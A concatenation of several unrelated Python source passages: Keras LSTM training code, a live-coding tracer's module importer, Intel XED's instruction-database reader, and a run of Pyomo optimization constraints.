x = _bidirectional_wrapper(
use_bidirectional = bidirectional,
merge_mode = 'sum',
inner_layer = self._inner_RNN_layer(
use_gru=use_gru,
output_dim=output_dim,
go_backwards=go_backwards,
return_sequences=return_sequences,
return_state=return_state))(previous_layer)
return x
#---------------------------------------------------------------------------------
def _compile_model(self):
if len(self.gpus) > 1:
self.parallel_model = multi_gpu_model(self.model, gpus=self.gpus)
self.parallel_model.compile(loss=self.loss, optimizer=self.optimizer, metrics=self.metrics)
else:
self.model.compile(loss=self.loss, optimizer=self.optimizer, metrics=self.metrics)
#--------------------------------------------
# Helper functions
#--------------------------------------------
def __get_in_scene_iteration_count(self, sample_count, batch_size):
return floor((sample_count + 1 - (self.w_num+self.out_w_num)) / batch_size)
#--------------------------------------------
def __get_in_scene_iteration_count_dynamic(self, sample_count, in_ts, out_ts, batch_size):
return floor((sample_count + 1 - (in_ts+out_ts)) / batch_size)
#--------------------------------------------
def __generator_nb_batch_samples(self, enc_scenes, batch_size):
scene_count = len(enc_scenes) # e.g. 10 scenes
sample_count = enc_scenes[0].shape[0] # with 250 encoded samples each
in_ts = self.w_num
out_ts = self.out_w_num
in_scene_it = self.__get_in_scene_iteration_count_dynamic(sample_count, in_ts, out_ts, batch_size)
return scene_count * in_scene_it
#--------------------------------------------
def __generator_scene_func(self, enc_scenes, batch_size):
shuffle = self.stateful is False
scene_count = len(enc_scenes)
sample_count = enc_scenes[0].shape[0]
in_scene_iteration = self.__get_in_scene_iteration_count_dynamic(sample_count, self.w_num, self.out_w_num, batch_size)
print("Scene Count: {} Sample Count: {} In-Scene Iteration: {}".format(scene_count, sample_count, in_scene_iteration))
while 1:
for i in range(scene_count):
scene = enc_scenes[i]
for j in range(in_scene_iteration):
enc_data = scene
start = j * batch_size
end = sample_count#((j+1) * self.batch_size) # - self.out_time_steps
X, Y = error_classification.restructure_encoder_data(
data = enc_data[start : end],
time_steps = self.w_num,
out_time_steps = self.out_w_num,
max_sample_count = batch_size)
# convert to (#batch, #ts, element_size)
X = X.reshape(*X.shape[0:2], -1)
Y = Y.reshape(Y.shape[0], self.out_w_num, -1)
if shuffle:
array.shuffle_in_unison(X, Y)
if self.in_out_states:
yield [X, np.zeros((self.b_num, self.encoder_lstm_neurons)), np.zeros((self.b_num, self.encoder_lstm_neurons)), np.zeros((self.b_num, self.decoder_lstm_neurons)), np.zeros((self.b_num, self.decoder_lstm_neurons))], [Y, np.zeros((self.b_num, self.encoder_lstm_neurons)), np.zeros((self.b_num, self.encoder_lstm_neurons)), np.zeros((self.b_num, self.decoder_lstm_neurons)), np.zeros((self.b_num, self.decoder_lstm_neurons))]
else:
yield [X], [Y]
#---------------------------------------------------------------------------------
def _train(self, epochs = 5, **kwargs):
# Arguments
X = kwargs.get("X")
Y = kwargs.get("Y")
train_scenes = kwargs.get("train_scenes", None)
validation_split = kwargs.get("validation_split")
callbacks = kwargs.get("callbacks", [])
# Train
model = self.model if self.parallel_model is None else self.parallel_model
batch_size = kwargs.get("batch_size", 8)
history = keras.callbacks.History()
history.on_train_begin()
# Default values for optional parameters
if validation_split == None:
validation_split = 0.1
# Train
train_generator = None
validation_generator = None
train_gen_nb_samples = 0
val_gen_nb_samples = 0
if train_scenes is not None:
# validation split
validation_scenes = train_scenes[ floor(len(train_scenes) * (1.0 - validation_split)) : ]
train_scenes = train_scenes[ : floor(len(train_scenes) * (1.0 - validation_split)) ]
# use generator
train_gen_nb_samples = self.__generator_nb_batch_samples(train_scenes, batch_size)
print ("Number of train batch samples per epoch: {}".format(train_gen_nb_samples))
assert train_gen_nb_samples > 0, ("Batch size is too large for current scene samples/timestep settings. Training by generator not possible. Please adjust the batch size in the 'settings.json' file.")
train_generator = self.__generator_scene_func(train_scenes, batch_size)
# validation samples
val_gen_nb_samples = self.__generator_nb_batch_samples(validation_scenes, batch_size)
assert val_gen_nb_samples > 0, ("Batch size is too large for current scene samples/timestep settings. Training by generator not possible. Please adjust the batch size in the 'settings.json' file.")
print ("Number of validation batch samples per epoch: {}".format(val_gen_nb_samples))
validation_generator = self.__generator_scene_func(validation_scenes, batch_size)
try:
trainingDuration = 0.0
trainStartTime = time.time()
if self.stateful:
reset_callback = StatefulResetCallback(model)
callbacks.append(reset_callback)
if (train_scenes is None):
assert X is not None and Y is not None, ("X or Y is None!")
for i in range(epochs):
hist = model.fit(
X,
Y,
epochs=1,
batch_size=batch_size,
shuffle=False,
validation_split=validation_split,
callbacks=callbacks)
history = merge_histories(history, hist)
model.reset_states()
else:
for i in range(epochs):
hist = model.fit_generator(
generator=train_generator,
steps_per_epoch=train_gen_nb_samples, # how many batches to draw per epoch
epochs = 1,
verbose=1,
callbacks=callbacks,
validation_data=validation_generator,
validation_steps=val_gen_nb_samples,
class_weight=None,
workers=1)
history = merge_histories(history, hist)
model.reset_states()
else:
if self.return_state:
reset_callback = StatefulResetCallback(model)
callbacks.append(reset_callback)
if (train_scenes is None):
assert X is not None and Y is not None, ("X or Y is None!")
history = model.fit(
X,
Y,
epochs=epochs,
batch_size=batch_size,
shuffle=True,
validation_split=validation_split,
callbacks=callbacks)
else:
history = model.fit_generator(
generator=train_generator,
steps_per_epoch=train_gen_nb_samples,
epochs = epochs,
verbose=1,
callbacks=callbacks,
validation_data=validation_generator,
validation_steps=val_gen_nb_samples,
class_weight=None,
workers=1)
trainingDuration = time.time() - trainStartTime
except KeyboardInterrupt:
print("Training duration (s): {}\nInterrupted by user!".format(trainingDuration))
print("Training duration (s): {}".format(trainingDuration))
return history
#---------------------------------------------------------------------------------
def print_summary(self):
print("Prediction")
self.model.summary()
#---------------------------------------------------------------------------------
def load_model(self, path):
print("Loading model from {}".format(path))
temp_model = load_model(path + "/prediction.h5")
if self.model is None:
self._build_model()
self.model.set_weights(temp_model.get_weights())
#---------------------------------------------------------------------------------
def save_model(self, path):
print("Saving model to {}".format(path))
# serialize model to JSON
model_to_json(self.model, path + "/prediction.json")
save_model(self.model, path + "/prediction.h5")
#---------------------------------------------------------------------------------
def predict(self, x, batch_size=32):
return self.model.predict(x, batch_size=batch_size)
from config import get_config
from utils import prepare_dirs_and_logger
from keras_data import BatchManager
import os
from utils import save_image
from LatentSpacePhysics.src.util.requirements import init_packages
from LatentSpacePhysics.src.nn.lstm.sequence_training_data import *
init_packages()
import git
#---------------------------------------------------------------------------------
if __name__ == "__main__":
config, unparsed = get_config()
prepare_dirs_and_logger(config)
config_d = vars(config) if config else {}
unparsed_d = vars(unparsed) if unparsed else {}
with open(config.model_dir + "/input_args.json", 'w') as fp:
json.dump({**config_d, **unparsed_d}, fp)
# create GIT file
repo = git.Repo(search_parent_directories=False)
open("{}/{}".format(config.model_dir, repo.head.object.hexsha), "w") | |
from ast import parse
from base64 import standard_b64encode
import builtins
from importlib.abc import MetaPathFinder, Loader
from importlib.machinery import ModuleSpec
from importlib.util import find_spec
import inspect
import io
import os
import sys
import types
from pathlib import Path
from .code_tracer import trace_source_tree, CONTEXT_NAME
from .traced_finder import DEFAULT_MODULE_NAME, LIVE_MODULE_NAME, \
PSEUDO_FILENAME, TracedFinder
try:
from .mock_turtle import MockTurtle, monkey_patch_pyglet
except ImportError:
MockTurtle = monkey_patch_pyglet = None
class DelegatingModuleFinder(MetaPathFinder):
def find_spec(self, fullname, path, target):
for finder in self.following_finders:
finder_find_spec = getattr(finder, 'find_spec', None)
if finder_find_spec:
spec = finder_find_spec(fullname, path, target)
if spec is not None:
return spec
@property
def following_finders(self):
is_after = False
for finder in sys.meta_path:
if not is_after:
is_after = finder is self
continue
yield finder
# noinspection PyAbstractClass
class TracedModuleImporter(DelegatingModuleFinder, Loader):
def __init__(self,
traced,
traced_file,
driver,
is_module,
is_live,
report_builder):
""" Import the code that has been instrumented for live coding.
:param str traced: name of module, function, class, or method to trace
:param traced_file: name of the file to replace with source code from
stdin, or None if all source code comes from files
:param [str] driver: command-line arguments for the driver script
:param bool is_module: True if the driver is a module, not a script
:param bool is_live: True if in live coding mode
:param ReportBuilder report_builder: to record events when the code
runs.
"""
self.is_traced_module_imported = False
self.traced = traced
self.environment = {CONTEXT_NAME: report_builder}
if driver and driver[0] == '-':
traced_file = PSEUDO_FILENAME
driver[0] = PSEUDO_FILENAME
if traced_file is None:
self.traced_file = traced_file
else:
try:
self.traced_file = str(Path(traced_file).resolve())
except FileNotFoundError:
self.traced_file = traced_file
self.source_code = traced_file and sys.stdin.read()
self.driver = driver
self.driver_module = driver[0] if is_module else None
self.is_module = is_module
self.is_live = is_live
self.source_finder = None
self.driver_finder = None
self.report_builder = report_builder
self.original_loaders = {} # {fullname: loader}
if self.traced is not None and self.traced == self.driver_module:
self.traced = LIVE_MODULE_NAME if is_live else DEFAULT_MODULE_NAME
is_plain_needed = is_divider_needed = False
if self.driver_module == 'pytest':
is_plain_needed = True
elif not is_module and driver:
try:
driver_file = Path(driver[0]).name
except ValueError:
driver_file = None
if driver_file == '_jb_pytest_runner.py':
is_plain_needed = True
is_divider_needed = True
if is_plain_needed:
# Assertion rewriting interferes with our module importer,
# so disable it. Leave it alone if it's explicitly set.
for driver_arg in self.driver:
if driver_arg.startswith('--assert'):
break
else:
if is_divider_needed:
self.driver.append('--')
self.driver.append('--assert=plain')
def find_spec(self, fullname, path, target=None):
spec = super(TracedModuleImporter, self).find_spec(fullname,
path,
target)
if spec is not None:
if spec.origin == self.traced_file:
self.record_module(fullname)
return ModuleSpec(fullname, self, origin=self.traced_file)
if self.traced_file is None and self.traced.startswith(fullname):
self.original_loaders[fullname] = spec.loader
spec.loader = self
return spec
if fullname == self.traced:
return ModuleSpec(fullname, self, origin=self.traced_file)
return None
def record_module(self, module_name):
""" Record the module that was traced. """
if self.traced is None:
if module_name != self.driver_module:
self.traced = module_name
elif self.is_live:
self.traced = LIVE_MODULE_NAME
else:
self.traced = DEFAULT_MODULE_NAME
def exec_module(self, module):
module_spec = getattr(module, '__spec__', None)
if module_spec:
module_file = module_spec.origin
else:
module_file = self.traced_file
parsed_filename = module_file
if (self.traced.startswith(DEFAULT_MODULE_NAME) or
self.traced.startswith(LIVE_MODULE_NAME)):
source_code = self.source_code
parsed_filename = PSEUDO_FILENAME
elif self.traced_file is not None and module_file == self.traced_file:
if self.source_code is None:
with open(self.traced_file) as source_file:
self.source_code = source_file.read()
source_code = self.source_code
else:
with open(module_file) as source_file:
source_code = source_file.read()
module_name = module.__name__
is_module_traced = False
source_tree = None
if self.traced == module_name:
is_module_traced = True
self.source_finder = TracedFinder(source_code, '', parsed_filename)
else:
if self.traced.startswith(module_name):
traced_child = self.traced[len(module_name)+1:]
elif self.traced in (DEFAULT_MODULE_NAME, LIVE_MODULE_NAME):
traced_child = self.traced
else:
traced_child = None
if traced_child:
source_finder = TracedFinder(source_code,
traced_child,
parsed_filename)
source_tree = source_finder.source_tree
if source_finder.traced_node is not None:
is_module_traced = True
self.source_finder = source_finder
else:
original_loader = self.original_loaders.get(module.__name__)
if original_loader is not None:
module_spec.loader = original_loader
return original_loader.exec_module(module)
if source_tree is None:
source_tree = parse(source_code, parsed_filename)
if is_module_traced:
source_tree = trace_source_tree(source_tree)
self.is_traced_module_imported = True
if (module_name in (DEFAULT_MODULE_NAME, LIVE_MODULE_NAME) and
self.driver_module):
target_module = self.driver_module
else:
target_module = module_name
if '.' in target_module:
package_name, child_name = target_module.rsplit('.', 1)
else:
package_name = None
module.__package__ = package_name
module.__file__ = module_file
module.__builtins__ = builtins
module.__dict__.update(self.environment)
self.environment = module.__dict__
# from ast import dump
# print(dump(source_tree, include_attributes=True))
compiled_code = compile(source_tree, PSEUDO_FILENAME, 'exec')
exec(compiled_code, self.environment)
def run_main(self):
if self.driver_module is None:
try:
driver_path = self.driver and str(Path(self.driver[0]).resolve())
except FileNotFoundError:
driver_path = self.driver and self.driver[0] or ''
self.is_traced_module_imported = (not self.driver or
self.traced_file == driver_path)
self.run_python_file(
self.driver and self.driver[0],
source_code=(self.source_code
if self.is_traced_module_imported
else None))
else:
self.run_python_module(self.driver_module)
def run_python_module(self, modulename):
""" Run a python module, as though with ``python -m name args...``.
:param str modulename: the name of the module, possibly dot separated.
This is based on code from coverage.py, by <NAME>.
https://bitbucket.org/ned/coveragepy
"""
spec = find_spec(modulename)
if spec is not None:
pathname = spec.origin
packagename = spec.name
elif (self.traced in (DEFAULT_MODULE_NAME,
LIVE_MODULE_NAME) and
self.source_code):
pathname = self.traced_file
packagename = self.driver_module
else:
raise ImportError(modulename)
if pathname.endswith("__init__.py") and not modulename.endswith("__init__"):
mod_main = modulename + ".__main__"
spec = find_spec(mod_main)
if not spec:
raise ImportError(
"No module named %s; "
"%r is a package and cannot be directly executed"
% (mod_main, modulename))
pathname = spec.origin
packagename = spec.name
packagename = packagename.rpartition(".")[0]
# Finally, hand the file off to run_python_file for execution.
pathname = os.path.abspath(pathname)
self.run_python_file(pathname, package=packagename)
def run_python_file(self, filename, package=None, source_code=None):
"""Run a python file as if it were the main program on the command line.
:param str filename: the path to the file to execute.
:param str package: the package name to set on the module.
:param str source_code: custom source code to replace the file contents.
"""
call_stack_files = [frame[0].f_code.co_filename
for frame in inspect.stack()]
top_file = call_stack_files[-1]
if os.path.basename(top_file) == 'runpy.py':
# Exclude runpy.py, used for python -m.
call_stack_files = [
frame_filename
for frame_filename in call_stack_files
if os.path.basename(frame_filename) != 'runpy.py']
top_file = os.path.dirname(call_stack_files[-1])
expected_path0 = os.path.abspath(os.path.dirname(top_file))
# Check that sys.path is as expected, otherwise leave it alone.
if os.path.abspath(sys.path[0]) == expected_path0:
if package is not None:
# add current directory to Python path
sys.path[0] = os.getcwd()
else:
# Set sys.path to target script's folder instead of space_tracer.
sys.path[0] = os.path.abspath(os.path.dirname(filename))
# Create a module to serve as __main__
module_name = (LIVE_MODULE_NAME
if self.traced == LIVE_MODULE_NAME
else DEFAULT_MODULE_NAME)
main_mod = types.ModuleType(module_name)
sys.modules[module_name] = main_mod
main_mod.__file__ = filename
main_mod.__builtins__ = builtins
if package:
main_mod.__package__ = package
code = self.make_code_from_py(filename, source_code)
if self.driver_finder.is_tracing:
main_mod.__dict__.update(self.environment)
self.environment = main_mod.__dict__
# Execute the code object.
exec(code, main_mod.__dict__)
def make_code_from_py(self, filename, source):
"""Get source from `filename` and make a code object of it."""
traced = self.traced
if source is None:
if (self.traced_file is not None and
(os.path.abspath(self.traced_file) ==
os.path.abspath(filename)) and
self.source_code is not None):
source = self.source_code
traced = self.traced or DEFAULT_MODULE_NAME
else:
with open(filename, 'r') as f:
source = f.read()
if traced:
if traced.startswith(DEFAULT_MODULE_NAME):
traced = traced[len(DEFAULT_MODULE_NAME)+1:]
self.is_traced_module_imported = True
elif traced.startswith(LIVE_MODULE_NAME):
traced = traced[len(LIVE_MODULE_NAME)+1:]
self.is_traced_module_imported = True
parsed_file = PSEUDO_FILENAME if traced == '' else filename
self.driver_finder = TracedFinder(source,
traced,
parsed_file)
to_compile = self.driver_finder.source_tree
if (traced == '' or
self.driver_finder.traced_node is not None):
to_compile = trace_source_tree(to_compile)
self.driver_finder.is_tracing = True
else:
self.driver_finder = TracedFinder(source, '', PSEUDO_FILENAME)
to_compile = self.driver_finder.source_tree
code = compile(to_compile, filename or PSEUDO_FILENAME, "exec")
return code
def report_driver_result(self, messages):
if self.traced in (DEFAULT_MODULE_NAME, LIVE_MODULE_NAME):
# Error is already visible, no extra display needed.
return
messages = list(split_lines(messages))
block_size = len(messages) + 2
self.report_builder.start_block(1, block_size)
message_width = 1
for lineno, message in enumerate(messages, 2):
message_width = max(len(message), message_width)
self.report_builder.add_message(message, lineno)
header = '-' * message_width + ' '
self.report_builder.add_message(header, 1)
self.report_builder.add_message(header, block_size)
self.report_builder.start_block(1, block_size)
self.report_builder.trace_extra_block(1, block_size)
def split_lines(messages):
for message in messages:
for line in message.splitlines():
yield line
class PatchedModuleFinder(DelegatingModuleFinder):
is_desperate = False
def __init__(self, is_zoomed):
self.is_zoomed = is_zoomed
def find_spec(self, fullname, path, target=None):
if fullname not in ('matplotlib',
'matplotlib.pyplot',
'numpy.random',
'random',
'pyglet'):
return None
spec = super(PatchedModuleFinder, self).find_spec(fullname, path, target)
if spec is not None:
spec.loader = PatchedModuleLoader(fullname,
spec.loader,
self.is_zoomed)
return spec
# noinspection PyAbstractClass
class PatchedModuleLoader(Loader):
def __init__(self, fullname, main_loader, is_zoomed):
self.fullname = fullname
self.main_loader = main_loader
self.is_zoomed = is_zoomed
self.plt = None
def exec_module(self, module):
if self.main_loader is not None:
self.main_loader.exec_module(module)
if self.fullname in ('numpy.random', 'random'):
module.seed(0)
elif self.fullname == 'matplotlib':
module.use('Agg')
elif self.fullname == 'matplotlib.pyplot':
self.plt = module
# noinspection | |
<filename>sniper/xed/pysrc/read_xed_db.py<gh_stars>0
#!/usr/bin/env python
# -*- python -*-
#BEGIN_LEGAL
#
#Copyright (c) 2018 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#END_LEGAL
import os
import sys
import re
import collections
import patterns
import slash_expand
import genutil
import opnd_types
import opnds
def die(s):
sys.stdout.write("ERROR: {0}\n".format(s))
sys.exit(1)
def msgb(b,s=''):
sys.stdout.write("[{0}] {1}\n".format(b,s))
class inst_t(object):
def __init__(self):
pass
class width_info_t(object):
def __init__(self, name, dtype, widths):
""" a name and a list of widths, 8, 16,32, and 64b"""
self.name = name.upper()
self.dtype = dtype
self.widths = widths
completely_numeric = re.compile(r'^[0-9]+$') # only numbers
def _is_bits(val):
"""Return a number if the value is in explicit bits form:
[0-9]+bits, or None"""
global completely_numeric
length = len(val)
if length > 4:
if val[-4:] == "bits":
number_string = val[0:-4]
if completely_numeric.match(number_string):
return number_string
return None
class xed_reader_t(object):
"""This class is designed to be used on the partial build materials
collected up in early part of the build and dumped in to the
BUILDDIR/dgen directory. Once initialized, the recs attribute
is what you'll iterate over to access the instruction records.
"""
def __init__(self,
state_bits_filename,
instructions_filename,
widths_filename,
element_types_filename):
self.xtypes = self._gen_xtypes(element_types_filename)
self.widths_dict = self._gen_widths(widths_filename)
self.state_bits = self._parse_state_bits(state_bits_filename)
self.deleted_unames = {}
self.deleted_instructions = {}
self.recs = self._process_lines(instructions_filename)
self._find_opcodes()
self._fix_real_opcode()
self._generate_explicit_operands()
self._parse_operands()
def _refine_widths_input(self,lines):
"""Return a list of width_info_t. Skip comments and blank lines"""
comment_pattern = re.compile(r'#.*$')
widths_list = []
for line in lines:
pline = comment_pattern.sub('',line).strip()
if pline == '':
continue
wrds = pline.split()
ntokens = len(wrds)
if ntokens == 3:
(name, dtype, all_width) = wrds
width8 = all_width
width16 = all_width
width32 = all_width
width64 = all_width
elif ntokens == 5:
width8='0'
(name, dtype, width16, width32, width64) = wrds
else:
die("Bad number of tokens on line: " + line)
# convert from bytes to bits, unless in explicit bits form "b'[0-9]+"
bit_widths = []
for val in [width8, width16, width32, width64]:
number_string = _is_bits(val)
if number_string:
bit_widths.append(number_string)
else:
bit_widths.append(str(int(val)*8))
widths_list.append(width_info_t(name, dtype, bit_widths))
return widths_list
def _gen_widths(self, fn):
lines = open(fn,'r').readlines()
widths_list = self._refine_widths_input(lines)
# sets the default data type for each width
widths_dict = {}
for w in widths_list:
widths_dict[w.name] = w.dtype
return widths_dict
def _gen_xtypes(self, fn):
lines = open(fn,'r').readlines()
xtypes_dict = opnd_types.read_operand_types(lines)
return set(xtypes_dict.keys())
def _compute_explicit_operands(self,v):
# all operands
v.operand_list = v.operands.split()
# just the explicit ones
expl_operand_list = []
for opnd in v.operand_list:
stg = None
vis = None
opname = None
if re.search(r'^[^:]*=',opnd):
pieces = opnd.split(':')
for i,p in enumerate(pieces):
if i == 0:
if '=' in p:
stg,opname = p.split('=')
elif p in ['IMPL', 'SUPP', 'EXPL', 'ECOND']:
vis = p
elif opnd.startswith('IMM0') or opnd.startswith('MEM0') or opnd.startswith('IMM1'):
pieces = opnd.split(':')
opname = pieces[0]
for i,p in enumerate(pieces):
if i>0 and p in ['IMPL', 'SUPP', 'EXPL', 'ECOND']:
vis = p
if opname and vis not in ['IMPL', 'SUPP', 'ECOND']:
expl_operand_list.append(re.sub(r'[()]*','',opname))
return expl_operand_list
def _generate_explicit_operands(self):
for v in self.recs:
if not hasattr(v,'iform'):
v.iform=''
v.explicit_operands = self._compute_explicit_operands(v)
def _parse_operands(self):
'''set v.parsed_operands with list of operand_info_t objects (see opnds.py).'''
for v in self.recs:
v.parsed_operands = []
for op_str in v.operand_list:
#op is an operand_info_t object
op = opnds.parse_one_operand(op_str,
'DEFAULT',
self.xtypes,
self.widths_dict)
v.parsed_operands.append(op)
#print "OPERAND: {}".format(op)
def _fix_real_opcode(self):
for v in self.recs:
if not hasattr(v,'real_opcode'):
v.real_opcode='Y'
def _find_opcodes(self):
'''augment the records with information found by parsing the pattern'''
map_pattern = re.compile(r'MAP=(?P<map>[0-6])')
vex_prefix = re.compile(r'VEX_PREFIX=(?P<prefix>[0-9])')
rep_prefix = re.compile(r'REP=(?P<prefix>[0-3])')
osz_prefix = re.compile(r'OSZ=(?P<prefix>[01])')
no_prefix = re.compile(r'REP=0 OSZ=0')
rexw_prefix = re.compile(r'REXW=(?P<rexw>[01])')
reg_required = re.compile(r'REG[[](?P<reg>[b01]+)]')
mod_required = re.compile(r'MOD[[](?P<mod>[b01]+)]')
mod_mem_required = re.compile(r'MOD!=3')
rm_required = re.compile(r'RM[[](?P<rm>[b01]+)]')
mode_pattern = re.compile(r' MODE=(?P<mode>[012]+)')
not64_pattern = re.compile(r' MODE!=2')
for v in self.recs:
if not hasattr(v,'isa_set'):
v.isa_set = v.extension
v.undocumented = False
if hasattr(v,'comment'):
if 'UNDOC' in v.comment:
v.undocumented = True
pattern = v.pattern.split()
p0 = pattern[0]
v.map = 0
v.space = 'legacy'
if p0 in ['0x0F']:
if pattern[1] == '0x38':
v.map = 2
opcode = pattern[2]
elif pattern[1] == '0x3A':
v.map = 3
opcode = pattern[2]
else:
v.map = 1
opcode = pattern[1]
elif p0 == 'VEXVALID=1':
v.space = 'vex'
opcode = pattern[1]
elif p0 == 'VEXVALID=2':
v.space = 'evex'
opcode = pattern[1]
elif p0 == 'VEXVALID=4': #KNC
v.space = 'evex.u0'
opcode = pattern[1]
elif p0 == 'VEXVALID=3':
v.space = 'xop'
opcode = pattern[1]
else:
opcode = p0
v.opcode = opcode
v.partial_opcode = False
mp = map_pattern.search(v.pattern)
if mp:
v.map = int(mp.group('map'))
v.no_prefixes_allowed = False
if no_prefix.search(v.pattern):
v.no_prefixes_allowed = True
v.osz_required = False
osz = osz_prefix.search(v.pattern)
if osz:
if osz.group('prefix') == '1':
v.osz_required = True
v.f2_required = False
v.f3_required = False
rep = rep_prefix.search(v.pattern)
if rep:
if rep.group('prefix') == '2':
v.f2_required = True
elif rep.group('prefix') == '3':
v.f3_required = True
if v.space in ['evex','vex', 'xop']:
vexp = vex_prefix.search(v.pattern)
if vexp:
if vexp.group('prefix') == '0':
v.no_prefixes_allowed = True
elif vexp.group('prefix') == '1':
v.osz_required = True
elif vexp.group('prefix') == '2':
v.f2_required = True
elif vexp.group('prefix') == '3':
v.f3_required = True
v.rexw_prefix = "unspecified"
rexw = rexw_prefix.search(v.pattern)
if rexw:
v.rexw_prefix = rexw.group('rexw') # 0 or 1
v.reg_required = 'unspecified'
reg = reg_required.search(v.pattern)
if reg:
v.reg_required = genutil.make_numeric(reg.group('reg'))
v.rm_required = 'unspecified'
rm = rm_required.search(v.pattern)
if rm:
v.rm_required = genutil.make_numeric(rm.group('rm'))
v.mod_required = 'unspecified'
mod = mod_required.search(v.pattern)
if mod:
v.mod_required = genutil.make_numeric(mod.group('mod'))
mod = mod_mem_required.search(v.pattern)
if mod:
v.mod_required = '00/01/10'
# 16/32/64b mode restrictions
v.mode_restriction = 'unspecified'
if not64_pattern.search(v.pattern):
v.mode_restriction = 'not64'
else:
mode = mode_pattern.search(v.pattern)
if mode:
v.mode_restriction = int(mode.group('mode'))
v.scalar = False
if hasattr(v,'attributes'):
v.attributes = v.attributes.upper()
if 'SCALAR' in v.attributes:
v.scalar = True
if opcode.startswith('0x'):
nopcode = int(opcode,16)
elif opcode.startswith('0b'):
# partial opcode.. 5 bits, shifted
nopcode = genutil.make_numeric(opcode) << 3
v.partial_opcode = True
v.upper_nibble = int(nopcode/16)
v.lower_nibble = nopcode & 0xF
def _parse_state_bits(self,f):
lines = open(f,'r').readlines()
d = []
state_input_pattern = re.compile(r'(?P<key>[^\s]+)\s+(?P<value>.*)')
while len(lines) > 0:
line = lines.pop(0)
line = patterns.comment_pattern.sub("",line)
line = patterns.leading_whitespace_pattern.sub("",line)
if line == '':
continue
line = slash_expand.expand_all_slashes(line)
p = state_input_pattern.search(line)
if p:
s = r'\b' + p.group('key') + r'\b'
pattern = re.compile(s)
d.append( (pattern, p.group('value')) )
else:
die("Bad state line: %s" % line)
return d
def _expand_state_bits_one_line(self,line):
new_line = line
for k,v in self.state_bits:
new_line = k.sub(v,new_line)
return new_line
def _process_lines(self,fn):
r = self._process_input_lines(fn)
r = self._expand_compound_values(r)
return r
def _expand_compound_value(self, in_rec):
""" v is dictionary of lists. return a list of those with one element per list"""
if len(in_rec['OPERANDS']) != len(in_rec['PATTERN']):
die("Mismatched number of patterns and operands lines")
x = len(in_rec['PATTERN'])
res = []
for i in range(0,x):
d = inst_t()
for k,v in in_rec.items():
if len(v) == 1:
setattr(d,k.lower(),v[0])
else:
if i >= len(v):
die("k = {0} v = {1}".format(k,v))
setattr(d,k.lower(),v[i])
res.append(d)
return res
def _delist(self,in_rec):
"""The valies in the record are lists. Remove the lists since they are
all now singletons """
n = inst_t()
for k,v in in_rec.items():
setattr(n,k.lower(),v[0])
return n
def _expand_compound_values(self,r):
n = []
for v in r:
if len(v['OPERANDS']) > 1 or len(v['PATTERN']) > 1:
t = self._expand_compound_value(v)
n.extend(t)
else:
n.append(self._delist(v))
return n
def _process_input_lines(self,fn):
"""We'll still have multiple pattern/operands/iform lines after reading this.
Stores each record in a list of dictionaries. Each dictionary has key-value pairs
and the value is always a list"""
started = False
recs = []
nt_name = "Unknown"
i = 0
for line in file(fn):
i = i + 1
if i > 500:
sys.stdout.write(".")
sys.stdout.flush()
i = 0
line = patterns.comment_pattern.sub("",line)
line=line.strip()
if line == '':
continue
line = slash_expand.expand_all_slashes(line)
if patterns.udelete_pattern.search(line):
m = patterns.udelete_full_pattern.search(line)
unamed = m.group('uname')
self.deleted_unames[unamed] = True
continue
if patterns.delete_iclass_pattern.search(line):
m = pattersn.delete_iclass_full_pattern.search(line)
iclass = m.group('iclass')
self.deleted_instructions[iclass] = True
continue
line = self._expand_state_bits_one_line(line)
p = patterns.nt_pattern.match(line)
if p:
nt_name = p.group('ntname')
continue
if patterns.left_curly_pattern.match(line):
if | |
m.x556 + m.x564 - m.x572 >= -50)
m.c1692 = Constraint(expr= m.x333 + m.x341 - m.x349 + m.x365 + m.x373 - m.x381 + m.x397 + m.x405 - m.x413 + m.x429
+ m.x437 - m.x445 + m.x461 + m.x469 - m.x477 + m.x493 + m.x501 - m.x509 + m.x525 + m.x533
- m.x541 + m.x557 + m.x565 - m.x573 >= 0)
m.c1693 = Constraint(expr= m.x334 + m.x342 - m.x350 + m.x366 + m.x374 - m.x382 + m.x398 + m.x406 - m.x414 + m.x430
+ m.x438 - m.x446 + m.x462 + m.x470 - m.x478 + m.x494 + m.x502 - m.x510 + m.x526 + m.x534
- m.x542 + m.x558 + m.x566 - m.x574 >= 0)
m.c1694 = Constraint(expr= m.x335 + m.x343 - m.x351 + m.x367 + m.x375 - m.x383 + m.x399 + m.x407 - m.x415 + m.x431
+ m.x439 - m.x447 + m.x463 + m.x471 - m.x479 + m.x495 + m.x503 - m.x511 + m.x527 + m.x535
- m.x543 + m.x559 + m.x567 - m.x575 >= 0)
m.c1695 = Constraint(expr= m.x336 + m.x344 - m.x352 + m.x368 + m.x376 - m.x384 + m.x400 + m.x408 - m.x416 + m.x432
+ m.x440 - m.x448 + m.x464 + m.x472 - m.x480 + m.x496 + m.x504 - m.x512 + m.x528 + m.x536
- m.x544 + m.x560 + m.x568 - m.x576 >= 0)
m.c1696 = Constraint(expr= m.x337 + m.x345 - m.x353 + m.x369 + m.x377 - m.x385 + m.x401 + m.x409 - m.x417 + m.x433
+ m.x441 - m.x449 + m.x465 + m.x473 - m.x481 + m.x497 + m.x505 - m.x513 + m.x529 + m.x537
- m.x545 + m.x561 + m.x569 - m.x577 >= -50)
m.c1697 = Constraint(expr= m.x346 + m.x350 + m.x378 + m.x382 + m.x410 + m.x414 + m.x442 + m.x446 + m.x474 + m.x478
+ m.x506 + m.x510 + m.x538 + m.x542 + m.x570 + m.x574 >= 0)
m.c1698 = Constraint(expr= m.x347 + m.x351 + m.x379 + m.x383 + m.x411 + m.x415 + m.x443 + m.x447 + m.x475 + m.x479
+ m.x507 + m.x511 + m.x539 + m.x543 + m.x571 + m.x575 >= 0)
m.c1699 = Constraint(expr= m.x348 + m.x352 + m.x380 + m.x384 + m.x412 + m.x416 + m.x444 + m.x448 + m.x476 + m.x480
+ m.x508 + m.x512 + m.x540 + m.x544 + m.x572 + m.x576 >= 0)
m.c1700 = Constraint(expr= m.x349 + m.x353 + m.x381 + m.x385 + m.x413 + m.x417 + m.x445 + m.x449 + m.x477 + m.x481
+ m.x509 + m.x513 + m.x541 + m.x545 + m.x573 + m.x577 >= 0)
